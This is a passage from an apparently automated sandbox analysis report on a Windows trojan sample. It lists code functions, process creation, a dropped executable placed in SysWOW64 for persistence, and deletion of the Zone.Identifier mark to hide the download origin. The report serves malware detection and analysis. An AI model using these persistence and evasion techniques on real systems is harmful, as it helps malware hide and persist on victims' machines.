                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_00420268
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0042339B
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0042C550
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0042E5F4
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_00428640
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0042063C
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0042F73C
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0041E780
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0043084D
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0040B8F6
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_00420A48
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0042EB36
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_00427C19
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0041FD95
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_00420E68
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_02302AEA
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_02302C80
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_022D4298
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_022D442E
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: String function: 004036EF appears 33 times
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: String function: 0041F71D appears 39 times
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: String function: 0041F6EA appears 140 times
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: String function: 00421418 appears 52 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: String function: 004036EF appears 33 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: String function: 0041F71D appears 39 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: String function: 0041F6EA appears 140 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: String function: 00421418 appears 52 times
                    Source: NWMEaRqF7s.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: NWMEaRqF7s.exe, 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamecmdcmxcfg.exe. vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe, 00000001.00000002.348521498.0000000002E30000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe, 00000001.00000002.348726962.0000000002F20000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe, 00000001.00000002.348726962.0000000002F20000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe | Binary or memory string: OriginalFilenamecmdcmxcfg.exe. vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: classification engine | Classification label: mal88.troj.evad.winEXE@8/4@0/88
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_02303686 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0040638F __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
                    Source: NWMEaRqF7s.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: NWMEaRqF7s.exe | Virustotal: Detection: 84%
                    Source: NWMEaRqF7s.exe | Metadefender: Detection: 68%
                    Source: NWMEaRqF7s.exe | ReversingLabs: Detection: 92%
                    Source: unknown | Process created: C:\Users\user\Desktop\NWMEaRqF7s.exe 'C:\Users\user\Desktop\NWMEaRqF7s.exe'
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Process created: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Process created: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Window detected: Number of UI elements: 11
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_00401D20 LoadLibraryW,GetProcAddress
                    Source: NWMEaRqF7s.exe | Static PE information: real checksum: 0x5d872 should be: 0x5cbf3
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0042145D push ecx; ret 1_2_00421470
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0041B69C push 59FFFE78h; ret 1_2_0041B6A5
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0041F7C2 push ecx; ret 1_2_0041F7D5
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0042145D push ecx; ret 3_2_00421470
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0041B69C push 59FFFE78h; ret 3_2_0041B6A5
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0041F7C2 push ecx; ret 3_2_0041F7D5
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_022D974C push edx; ret 3_2_022D9761

                    Persistence and Installation Behavior:

                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Executable created and started: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | PE file moved: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe

                    Hooking and other Techniques for Hiding and Protection:

                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | File opened: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_00402130 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_004078B8 IsIconic,GetWindowPlacement,GetWindowRect, 1_2_004078